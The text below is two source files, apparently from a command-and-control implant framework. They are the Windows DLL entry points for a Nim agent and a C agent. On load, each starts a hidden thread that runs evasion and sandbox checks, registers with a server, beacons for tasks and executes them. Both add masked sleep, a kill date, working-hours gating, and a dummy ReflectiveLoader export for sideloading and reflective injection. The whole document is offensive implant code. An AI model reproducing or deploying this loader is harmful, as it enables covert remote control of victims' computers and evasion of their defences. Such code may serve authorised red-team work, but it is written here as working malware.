File: agents/agent-nim/agent_dll.nim
## Nim agent — Windows DLL entry point.
## Compiled with --app:lib; Nim generates DllMain → NimMain → module init.
## Module-level code starts the agent loop in a background thread so
## DllMain returns immediately (avoids loader-lock deadlock).
## Export: ReflectiveLoader (ordinal 1) for sideloading compatibility.

import std/[times, strutils, random]
import winim/lean
import config, transport, commands, evasion

proc agentThread(p: pointer): DWORD {.stdcall.} =
  randomize()

  when KillDate != "":
    try:
      let kd = parse(KillDate, "yyyy-MM-dd")
      if now() > kd: ExitProcess(0)
    except: discard

  applyEvasion()
  var t = newTransport()

  while not t.register():
    sleepMasked(30_000)

  while true:
    when KillDate != "":
      try:
        let kd = parse(KillDate, "yyyy-MM-dd")
        if now() > kd: ExitProcess(0)
      except: discard
    try:
      let tasks = t.beacon()
      for task in tasks:
        dispatchTask(t, task.id, task.typ, task.args, task.payload)
    except: discard
    sleepMasked(currentSleepMs())
  return 0

# Neutral export for sideloading (ordinal 1 / reflective loader naming)
proc ReflectiveLoader*() {.exportc, stdcall, dynlib.} = discard

# Module-level init — executes inside NimMain on DLL_PROCESS_ATTACH.
# CreateThread returns before the thread runs, so DllMain exits cleanly.
let dllHThread = CreateThread(nil, 0,
  cast[LPTHREAD_START_ROUTINE](agentThread), nil, 0, nil)
if dllHThread != 0: discard CloseHandle(dllHThread)

File: agents/agent-c/agent_dll.c
/* DLL entry point for the C agent.
 * Compile with -shared instead of -mwindows.
 * DllMain spawns the agent loop in a background thread so it returns
 * immediately — running agent code inside DllMain causes loader-lock deadlock.
 */
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include "config.h"
#include "transport.h"
#include "commands.h"
#include "evasion.h"
#include "api_resolve.h"

static DWORD WINAPI agent_thread(LPVOID param) {
    (void)param;

    api_init();
    sandbox_check();
    evasion_init();

    if (AGENT_CANARY_DOMAIN[0] != '\0') {
        WSADATA wsa = {0};
        if (WSAStartup(MAKEWORD(2,2), &wsa) == 0) {
            struct addrinfo hints = {0}, *res = NULL;
            getaddrinfo("canary." AGENT_CANARY_DOMAIN, NULL, &hints, &res);
            if (res) freeaddrinfo(res);
        }
    }

    while (!agent_register()) {
        sleep_masked(30000);
    }

    for (;;) {
        if (!in_working_hours()) {
            sleep_until_work_hours();
            continue;
        }
        int count = 0;
        AgentTask *tasks = agent_beacon(&count);
        for (int i = 0; i < count; i++) {
            dispatch_task(&tasks[i]);
        }
        tasks_free(tasks, count);
        screenwatch_tick();
        sleep_masked(sleep_ms_jitter());
    }
    return 0;
}

/* Neutral export for sideloading / reflective injection (ordinal 1). */
__declspec(dllexport) void ReflectiveLoader(void) {}

BOOL WINAPI DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved) {
    (void)hInst; (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(hInst);
        HANDLE ht = CreateThread(NULL, 0, agent_thread, NULL, 0, NULL);
        if (ht) CloseHandle(ht);
    }
    return TRUE;
}
